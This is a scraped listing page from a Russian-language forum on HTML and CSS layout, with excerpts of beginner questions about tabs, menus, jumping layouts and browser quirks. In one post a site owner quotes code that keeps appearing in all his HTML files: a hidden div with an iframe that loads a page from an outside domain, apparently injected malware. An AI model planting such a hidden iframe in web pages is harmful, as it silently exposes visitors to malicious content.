HTML Coding
Subforums
-
- 30.1k
- 1k
- Про макеты
- By klierik,
Explore Questions
There are no popular questions to show right now
-
0 votes0 answers
-
0 votes0 answers
-
0 votes0 answers
-
0 votes1 answer
-
0 votes3 answers
29,542 questions in this forum
-
Прошу помощи с установкой высоты страницы
Господа, есть один небольшой сайт обычной школы ( link ), где контент части страниц сделан в виде блоков с закладками на чистом css. Всё бы ничего, но содержимое всех закладок раз ное и из-за этого "прыгает" высота страниц. Можно ли как-то сделать, чтобы она была постоянной или изменялась в зависимости от высоты содержимого закладки? Пример "проблемной" страницы, например, можно посмотреть вот тут link. Спасибо.
0 votes2 answers -
Прошу помощи с формой отправки
Коллеги, помогите, плиз, решить задачу с формой. Имею: <select name="pay_mode"> <option value="21">Банковский платёж</option> <option value="3">Почтовый перевод</option> <option value="4">WMR</option> <option value="2">RBK Money</option> </select></td></tr><tr><td height="20" colspan="2"> </td></tr> </table> <input type="hidden" name="count" value="1"><input name="tovar_id" value="2"> и так далее... КАК сделать так, чтобы при выборе, например "Почтовый перевод", информация отправлялась не с <input name="tovar_id" value="2">, а с <input name="tovar_id"…
0 votes7 answers -
Прошу помощи со слоями
Пытался поискать на форуме похожее, не нашел... на сайте тоже простые примеры и не раскрывают решения проблемы... хотя, может просто я не понимаю. Задача: есть несколько строк, наводя на которые должны открываться слои, содержащие более подробную информацию об этих строках... Ниже пример кода. В нем такой минус: когда появляется слой большего размера, он опускает нижний слой. <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>My Div</title> </head> <style type="text/css"> .block1 { position: relative; width: 200px; background: #ccc; padding: 5px; padding-right: 20px; border: solid 1px black; fl…
0 votes9 answers -
Прошу помощи: видео youtube перекрывает картинку на сайте
Здравствуйте. Суть проблемы: На сайте установлена lightgallery и видео с youtube. Когда нажимаешь на миниатюру картинки с галереи - она разворачивается в истинный размер, НО она находится ПОД видео с Ютуба. Скриншот во вложении. Мозилла всё видит хорошо, а вот Опера и Эксплорер - как на скриншоте. Как сделать, чтобы изображение было НАД видео? Огромное спасибо всем откликнувшимся.
0 votes1 answer -
ПРОШУ ПОМОЩИ!
ПРОШУ ПОМОЩИ СПЕЦОВ! У МЕНЯ ПРОБЛЕМА, РАМКА ВОКРУГ ФОТО СО ССЫЛКОЙ В INTERNET EXPLORER ВЫСВЕЧИВАЕТСЯ НОРМАЛЬНО, А В ОПЕРЕ И ЛИСЕ - ЖИРНАЯ СИНЯЯ ПОЛОСА ПО НИЗУ ФОТОГРАФИИ. В ПРОГРАММИРОВАНИИ Я ДУБ. ЕДИНСТВЕННОЕ ЧТО МОГУ СДЕЛАТЬ - ИСПРАВИТЬ САМОЕ ПРОСТЕЙШЕЕ В СТИЛЯХ (НАПРИМЕР, ФОН). ВЫРУЧАЙТЕ! ПОДСКАЖИТЕ ЧТО ДЕЛАТЬ. ПЫТАЛСЯ СДЕЛАТЬ САЙТ ГОРОДА, ПОСМОТРИТЕ ЧТО ВЫШЛО. http://www.borovsk-1358.ru/node/18 ПОМОГИТЕ КТО МОЖЕТ, ПОЖАЛУЙСТА!
0 votes14 answers -
Прошу помощи!
Всем доброго времени суток! Хочу научиться верстке сайтов, html немного знаю, подскажите легкий шаблон psd на котором можно учиться верстке.
0 votes1 answer -
Прошу посмотреть, куда пропало изображение
Есть сайт http://molclub.ru/. Там есть лента новостей, под заголовком. Кнопка "влево", блоки, кнопка "вправо". Все float: left;. А кнопки справа не видно. Почему? Лента - .pipe в файле main.css. Готов выписать нужные части, но боюсь, проблема будет как раз вне этих строк. Заранее благодарен.
0 votes3 answers -
Прошу почоч добрых людей
Всем доброго времени суток. Я новичёк в HTML. Делаю для близкого человека сайт http://finkatut.ucoz.ru/. Подскажите, в чём у меня ошибки, где ваш опытный взгляд видит косяки? Так же есть проблемы с отоброжением в IE, ОЧЕНЬ ПРОШУ вашей помощи. css верхнего меню css для меню сбоку
0 votes4 answers -
Прошу прощения, помогите, пожалуйста)
Извиняюсь за дубовость, но не могу что-то создать тему в разделе для халявщиков, но мне очень нужно кое-что узнать. Господа Модераторы, перенаправьте тему и подскажите, как задать интересующие меня вопросы. Заранее благодарю. Cкажите, пожалуйста, как сделать чтобы при нажатии на кнопочку текст свыше исчезал, а при повторном клике снова появлялся. Как создать кнопку я знаю...а вот как ИМЕННО нужно воспользоваться событием онклик недопетриваю... хелп ми плиз
0 votes3 answers -
Прошу совет в верстке шапки
Добрый день. Прошу не пинайте сильно сразу. Сверстал сайт на wordpress, но теперь возникла потребность в изменении дизайна. сайт _hhttp://stereoinside.ru Хочу сделать согласно картинке. Header.php переделал, теперь он имеет код <body> <div id="top"> <div id="header"> <div class="description"><h1><?php bloginfo('name'); ?></h1> <?php bloginfo('description'); ?></div> <div class="clearfloat"/> </div> </div> <div id="container"></div> <?php wp_nav_menu( array( 'theme_location' => 'main-menu' ) ); ?> </div> </body> </html> А как именно в css прописать не соображ…
0 votes8 answers -
Прошу совета
здравствуйте! Прошу совета у вас, как мне правильно реализовать некоторые моменты в дизайне. Прошу подсказать мне, с чего начать и как определяются некоторые детали для качественной верстки. Есть множество задумок дизайнеров, где определенные эллементы сайта имеют красивые очертания, (выкопал в инете) , например, фон для названия страницы: или фон для цитат: Т.е. что тут видно, в первом случае это фон названия старницы (материала). По сути просто представляет из себя блок из светлого фона, но у него в начале идет внутреняя стрелочка (честно говоря не знаю как ее еще назвать), и в конце идет стрелочка вниз. Во втором же эллементе фон для цитаты, с внешними эллементами с…
0 votes3 answers -
Прошу совета по верстке
Привет, ребят! Пришел макет от дизайнера. Всё бы ничего, но я в растерянности. Совершенно не представляю, как добавить декоративный элемент - кольца, те что от дива к диву на картинки. Все идеи, что пришли на ум - абсолютное позиционирование - отмёл, слишком неудобно; и вариант - сделать background-image по краям дивов, как бы псевдо-промежуток между блоками - не уверен в его состоятельности. Подскажите идеи, как осуществить, т.к. сам еще не сталкивался с такой задачей! Заранее спасибо!
0 votes4 answers -
Прошу совета по организации работы над созданием сайта
Уважаемые гуру! Доброго вам времени суток. Поискал здесь на форуме, но ответа на свой вопрос пока не нашел, может плохо искал? Тем не менее. Назрела насущная необходимость в создании городского портала. Если б не кризис сам бы с версткой не заморачивался, вам бы заказал. Но, увы. Прочитал несколько книг по верстке, чувствую, что погружаюсь в болото, теряю направление. Вообще для себя определился, что верстка - CSS и только CSS. Придется еще написать базу данных на MySQL, для каталога предприятий. Нашел статью как делается блок новостей на PHP. А вопрос собственно вот в чем: возможно ли сделать интерактивный сайт (чтобы посетители оставляли комментарии) без использования J…
0 votes16 answers -
Прошу совета, на серваке в штмл файлах появляется бог знает что...
С завидной регулярностью в HTML коде появляется вот такая ересь: <body id="page5"><div style="display:none">lazwlewufzhcycdvamfcxprsyoqvljy<iframe width=130 height=658 src="http://privius-life.ru:8080/index.php" ></iframe></div> хотя я сам лично пишу только вот это: <body id="page5"> Что это такое и откуда оно берется??? И самое главное как с этим бороться??? И самое интересное что эта ерунда появляется во всех файлах штмл.
0 votes8 answers -
Прошу совета. Правила, принципы, секреты и т.д верстки
В сети есть интенсивы от HTML Academy. В них есть лекции где рассказываются всяческие хитрости, правила, принципы верстки. Например, скрипт надо подключать в конце страницы что б он не блокировал загрузку кода, что теги label и input можно группировать с помощью р и тд. Но эти лекции длятся просто невыносимо долгое количество времени, много разговоров, отвлечения на чат, между полезной информацией, как например вышеописанная, и нет просто времени все это просматривать несколько часов видео в поиске этих вещей. Есть ли такая информация в текстовом виде или в более коротком видеоформате. Пытался гуглить, но ничего не нашел, так как, скорее всего, я не правильно описывал и ф…
0 votes3 answers -
Прошу советов по верстке меню (Joomla 1.5)
Всем привет! В общем дали шаблон с горизонтальным меню и индивидуальными картинками к пунктам: Все просто - картинка сверху, текст снизу... Сперва впервые сделал на жумле 1.6, там все быстро получилось 0_о, имхо - 1 вариант отображению меню - список и ковыряй... Потом решил повторить тоже самое на 1.5 и... ничего не получается... Не знаю, есть ли смысл кидать код - не знаю какой выбрать режим... Как бы вопрос скорее к тем, кто делал подобное на жумле...
0 votes6 answers -
Проьлема с meta tegs
Всем зравствуйте. Есть вопрос - сайту больше 2-х месяцев. Метатеги title и description прописаны были изначально не на всех страницах. Решили что сушествующие тайтлы и дискры надо поменять а там где не было - добавить. И вот прошла уже неделя с момента как поменяли метатеги, а гугл в выдаче до сих пор показывает старые тайтлы и дискры... Где проблема?
0 votes3 answers -
Проявить бблоки по ссылки
Здравствуйте, уважаемые! Это снова я. На сей раз у меня следующий вопрос: поставлена задача при клике на ссылку (определенную ссылку) необходимо отобразить на этой же странице еще несколько по сути схожих блока, как это сделать? какими средставами? если кто знает где можно найти такой пример (скрипт и т.д.) поделитесь, пожалуйста. Спасибо!
0 votes4 answers -
Проявляющийся блок при наведении мыши. Как реализовать.
Как реализовать идею такую как на сайте Розетки http://rozetka.com.u.../185/index.html. При наведении мыши на блок открывается полное его представление. Не могу понять в какие дивы и с каким позиционированием обернуть информацию чтобы получить такой эффект. Буду благодарен за помощь.
0 votes5 answers -
Пршу помощи в создании таблицы
Добрый вечер. У меня есть друг-тренер по цигуну. Я решил помочь ему в популяризации занятий, а так же с wелью создать ресурс, где могут пообщяться люди, занимающиеся саморазвитием. Так как навыка у меня не было никакого, решил воспользоваться возможностями системы Ucoz. Прикупил домен. Получилось вот что На примере аналогичного сайта в Рунете, хочу сделать страничку, где можно посмотреть ближайшие занятия не только по цигуну, но и по другим направлениям. Всё в одном месте. А то сам когда то, имея свободные выходные, часами выискивал, какой семинар и где можно посетить именно в это время. Так вот, собственно, просьба. Не мог бы кто нибудь мне помочь сделать такую странич…
0 votes5 answers -
прыгает css.
Всем привет, такой косяк : "Иногда при обновлении страницы, div друг за друга вылазят, а обычно нет. На той же самой страничке. в чём проблема? Оффтоп: как растянуть на всё высоту экрана при любом маштабе элемент?
0 votes1 answer -
Прыгает верстка при переходе на страницы
Всем здравствуйте! Прыгает верстка при переходе на разные страницы сайта, немогу найти косяк. Если контента много, то все ок, а если мало, то прыгает. Подскажите что может быть. Сайт http://prime-wedding.ru/wedding-dress/ и http://prime-wedding.ru/acessoires/
0 votes10 answers -
прыгает меню при нажатии помогите
Приветствую при нажатии на ссылку в меню все ссылки которые там находятся прыгают вверх, потом возвращаются назад смотрится некрасиво ( _polukred.ru вот сайт, на верхнем меню не прыгает только при нажатии на Главная, остальные все нажимаешь - прыгают как исправить не пойму, по моему на всем сайте что то не так с ссылками подскажите что не так в ксс и как поправить ?
0 votes3 answers -
Прыгает модуль меню
Я вообще PHP разработчик, но так как мне заказали сайт, дизайнера нет, CMS своя. Я начал делать, всё делал как желает заказчик. но в ходе работы возникла неприятность, прыгает верхнее меню, и пустые строки в исходном коде. Вот ссылка на сайт: http://art-delo.com.ua/
0 votes8 answers -
Прыгает правая колонка
Всем привет, появилась такая проблема, никак не могу решить. http://www.searchenginejournal.ru/ Если, например, в Firefox обновлять, то правая колонка не сразу подгружается, а лишь через какое-то время. Надо сделать так, чтобы центрировалось всегда, а не прыгало. Заранее спасибо за помощь!
0 votes6 answers